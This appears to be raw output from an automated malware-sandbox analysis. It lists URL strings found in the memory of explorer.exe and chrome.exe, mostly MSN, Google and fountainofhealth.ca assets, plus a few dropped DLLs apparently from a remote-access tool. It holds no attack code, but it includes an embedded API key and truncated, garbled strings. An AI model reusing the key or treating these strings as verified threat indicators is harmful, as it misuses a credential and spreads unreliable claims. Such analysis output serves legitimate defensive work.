Source: explorer.exe, 00000014.00000000.1343526292.000000000B990000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1922881890.000000000BD3A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2103016733.000000000BD3A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1589213992.000000000BD3A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000014.00000000.1343526292.000000000B990000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS000.
Source: explorer.exe, 00000014.00000003.1922881890.000000000BD3A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2103016733.000000000BD3A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1589213992.000000000BD3A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSosk.exe
Source: explorer.exe, 00000014.00000000.1343526292.000000000B990000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSsRN
Source: explorer.exe, 00000014.00000003.1922881890.000000000BD3A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2103016733.000000000BD3A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1589213992.000000000BD3A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSte=Y_
Source: explorer.exe, 00000014.00000003.1920742592.0000000008207000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000014.00000000.1337084127.0000000008170000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1920742592.00000000081DE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000014.00000000.1337084127.0000000008170000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?=
Source: explorer.exe, 00000014.00000003.2018621481.0000000006C49000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=BD3E37D8C4964A928E655AAA177D65C1&timeOut=5000&oc
Source: explorer.exe, 00000014.00000003.2018621481.0000000006C49000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000014.00000000.1337084127.0000000008313000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1920742592.0000000008350000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?t2
Source: explorer.exe, 00000014.00000000.1337084127.0000000008170000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comb
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/WindyV2.svg
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://becausemomsays.com/she-wanted-to-keep-her-deceased-husbands-ring-so-she-selfishly-denied-her
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13g0vJ
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13g0vJ-dark
Source: explorer.exe, 00000014.00000003.1585593064.0000000006C95000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1919124163.0000000006C95000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2018621481.0000000006C95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gK0V
Source: explorer.exe, 00000014.00000003.1585593064.0000000006C95000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1919124163.0000000006C95000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2018621481.0000000006C95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gK0V-dark
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-dark
Source: chrome.exe, 00000000.00000003.1856103954.0000742401145000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2016699284.0000742400A07000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 00000000.00000003.1815893324.0000742402F4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clientservices.googleapis.com/uma/v2
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cookpolitical.com/2020-national-popular-vote-tracker
Source: chrome.exe, 00000000.00000003.2420118176.0000742402CD6000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/cloudview-release
Source: chrome.exe, 00000000.00000003.2420118176.0000742402CD6000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/cloudview-releasecross-origin-resource-policy:cross-origincross-origi
Source: pcicapi.dll.31.dr, PCICL32.DLL.31.dr, PCICHEK.DLL.31.dr, TCCTL32.DLL.31.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: pcicapi.dll.31.dr, PCICL32.DLL.31.dr, PCICHEK.DLL.31.dr, TCCTL32.DLL.31.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dl.google.com/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64_win_third_p
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dl.google.com/release2/chrome_component/ac2ulwywnwgn2xush6ktfxep2vqq_3070/jflookgnkcckhobagl
Source: chrome.exe, 00000000.00000003.1694503576.0000742403D1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.google.com/release2/chrome_component/acahfy6bgvyjwyod7x6z6ar3cd4q_138.1/
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dl.google.com/release2/chrome_component/acahfy6bgvyjwyod7x6z6ar3cd4q_138.1/mfhmdacoffpmifoib
Source: chrome.exe, 00000000.00000003.2421879023.0000742401E79000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: chrome.exe, 00000000.00000003.2421879023.0000742401E79000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultult
Source: chrome.exe, 00000000.00000003.2421879023.0000742401E79000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultult0A
Source: chrome.exe, 00000000.00000003.2421879023.0000742401E79000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: chrome.exe, 00000000.00000003.2419079385.0000742401112000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: chrome.exe, 00000000.00000003.2421879023.0000742401E79000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: chrome.exe, 00000000.00000003.2421879023.0000742401E79000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: chrome.exe, 00000000.00000003.2421879023.0000742401E79000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_defaultr7
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/ac2ulwywnwgn2xush6ktfxep2vqq_3070/jflook
Source: chrome.exe, 00000000.00000003.1694503576.0000742403D1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acahfy6bgvyjwyod7x6z6ar3cd4q_138.1/
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/ad6bqrogtrdeb2aualzvp3izob2a_3/hajigopbb
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/j2hxfei2occ5siitujtlwgp6xi_3/ojhpjlocmbo
Source: explorer.exe, 00000014.00000000.1337084127.0000000008313000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://financebuzz.com/top-signs-of-financial-fitness?utm_source=msn&utm_medium=feed&synd_slide=1&s
Source: chrome.exe, 00000000.00000003.3390319725.00007424004D2000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3269307697.0000742402162000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3350009991.000074240118D000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2543300071.00007424014C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca
Source: chrome.exe, 00000000.00000003.3390319725.00007424004D2000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3188767621.0000742400896000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2419319555.0000742401BA1000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3269307697.0000742402162000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2016795559.00007424030C2000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3350009991.000074240118D000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2217660889.0000742401B31000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2543300071.00007424014C7000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2421198380.000074240326F000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2420969918.00007424015CF000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2665480326.00007424003C4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.1856136210.0000742401B77000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/.ca/
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/cdn-cgi/challenge-platform/h/g/scripts/jsd/6fab0cec561d/main.js?
Source: chrome.exe, 00000000.00000003.2420598347.0000742401C63000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/cdn-cgi/rum?
Source: chrome.exe, 00000000.00000003.2419079385.0000742401112000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/themes/base/button.css?swwsy8
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/themes/base/theme.css?swwsy8
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/data-min.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2665480326.00007424003C4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/focusable-min.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.1694222507.0000742401CEC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/ie-min.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/labels-min.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/plugin-min.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/unique-id-min.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2665480326.00007424003C4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/version-min.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2420969918.00007424015CF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/widgets/button-min.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/loadjs/loadjs.min.js?v=4.2.0
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/tabbable/index.umd.min.js?v=6.1.2
Source: chrome.exe, 00000000.00000003.2543300071.00007424014C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/tabbable/index.umd.min.js?v=6.1.2E027DA2CDEC333310
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/underscore/underscore-min.js?v=1.13.6
Source: chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/misc/dialog/dialog.ajax.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.3228919167.0000742400407000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/misc/dialog/dialog.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/misc/dialog/dialog.position.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2217660889.0000742401B31000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/misc/drupal.init.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/misc/jquery.tabbable.shim.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.3350009991.000074240118D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/misc/progress.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/modules/ckeditor5/css/ckeditor5.dialog.fix.css?swwsy8
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/modules/ckeditor5/js/ckeditor5.dialog.fix.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2421198380.000074240326F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/modules/layout_discovery/layouts/onecol/onecol.css?swwsy8
Source: chrome.exe, 00000000.00000003.2421198380.000074240326F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/modules/system/css/components/fieldgroup.module.css?swwsy8
Source: chrome.exe, 00000000.00000003.2421198380.000074240326F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/modules/system/css/components/fieldgroup.module.css?swwsy8$t
Source: chrome.exe, 00000000.00000003.2419079385.0000742401112000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/core/modules/views/css/views-responsive-grid.css?swwsy8
Source: chrome.exe, 00000000.00000003.1653712601.0000742400525000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.1856136210.0000742401B77000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/en
Source: chrome.exe, 00000000.00000003.3390319725.00007424004D2000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3350009991.000074240118D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/en#
Source: chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/en(
Source: chrome.exe, 00000000.00000003.2746010123.0000742401B16000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/en/search/node
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/libraries/jquery.cycle/jquery.cycle.all.js?v=3.0.3
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/modules/ajax_loader/js/ajax-throbber.js?v=1.x
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2420969918.00007424015CF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/modules/google_analytics/js/google_analytics.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/modules/views_slideshow/js/views_slideshow.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2016795559.00007424030C2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/modules/views_slideshow/modules/views_slideshow_cycle/js/views_slideshow
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/modules/webform/js/webform.behaviors.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/modules/webform/js/webform.states.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/modules/webform/modules/webform_bootstrap/js/webform_bootstrap.states.js
Source: chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2419319555.0000742401BA1000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2419079385.0000742401112000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/FOH%20-%20Favicon.png
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/FOH%20-%20Favicon.pngme
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/Message-Blue.png
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/Message-Blue.pngler
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/button-thoughts-e_1.png
Source: chrome.exe, 00000000.00000003.2705710332.0000742401585000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/button-thoughts-h_1.png
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/button-thoughts-i_1.png
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/button-thoughts-v_1.png
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/facebook-t.svg
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/facebook.svg
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/foh-logo%203.svg
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icon-1-300_6.png
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icon-E-300_6.png
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icon-E-300_6.png1.png
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icon-H-300_6.png
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icon-R-300_6.png
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icon-T-300_7.png
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icon-V-300_6.png
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icons8-download-40.png
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icons8-up-64.png
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/leaves-banner-2_0_0.jpg
Source: chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3269307697.0000742402162000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/redirect%20icone%20.png
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/twitter-t.svg
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/wellness-app.gif
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/youtube-t.svg
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/youtube.svg
Source: chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/dialog.js?swwsy8trap/js/misc/states.js?swwsy8
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/drupal.bootstrap.js?swwsy8
Source: chrome.exe, 00000000.00000003.3228919167.0000742400407000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/misc/ajax.js?swwsy8
Source: chrome.exe, 00000000.00000003.3390319725.00007424004D2000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/misc/dialog.ajax.js?swwsy8
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/misc/dialog.ajax.js?swwsy8t
Source: chrome.exe, 00000000.00000003.3390319725.00007424004D2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/misc/message.js?swwsy8
Source: chrome.exe, 00000000.00000003.2543300071.00007424014C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/misc/progress.js?swwsy8
Source: chrome.exe, 00000000.00000003.2543300071.00007424014C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/misc/progress.js?swwsy810.1.0
